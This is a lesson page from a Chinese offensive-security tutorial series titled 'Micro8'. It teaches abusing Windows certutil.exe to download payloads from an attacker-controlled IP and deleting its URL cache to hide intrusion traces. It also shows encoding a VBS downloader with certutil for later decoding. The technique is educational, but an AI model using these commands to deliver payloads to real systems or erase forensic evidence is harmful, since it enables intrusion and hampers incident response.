Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
第三十一课:msf的前生今世
第三十二课:配置vps上的msf
第三十三课:攻击Mysql服务
第三十四课:攻击Sql server 服务
第三十五课:与Sqlmap结合攻击
第三十六课:解决vps上ssh掉线
第三十七课:vbs一句话下载payload
第三十八课:certutil一句话下载payload
第三十九课:vbs一句话下载payload补充
第四十课:ftp一句话下载payload
41-50课
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第三十八课:certutil一句话下载payload
certutil微软官方是这样对它解释的:
Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。
url:
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732443(v=ws.11
)
但是近些年好像被玩坏了。
靶机:
windows 2003 windows 7
1
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
Copied!
默认下载为bin文件。但是不影响在命令行下使用。
certutil.exe 下载有个弊端,它的每一次下载都有留有缓存,而导致留下入侵痕迹,所以每次下载后,
需要马上执行如下
:
1
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete
Copied!
而在应急中certutil也是常用工具之一,来对比文件hash,来判断疑似文件。
Windows 2003:
Windows 7:
certutil的其它高级应用:
1
C:
\
>
certutil -encode c:
\
downfile.vbs downfile.bat
Copied!
file:downfile.bat
解密:
file:downfile.txt
后者的话:powershell内存加载配合certutil解密是一件非常有趣的事情。会在未来的系列中讲述。
Micropoor
Previous
第三十七课:vbs一句话下载payload
Next
第三十九课:vbs一句话下载payload补充
Last modified
2yr ago
Copy link
Contents
certutil微软官方是这样对它解释的:
certutil的其它高级应用: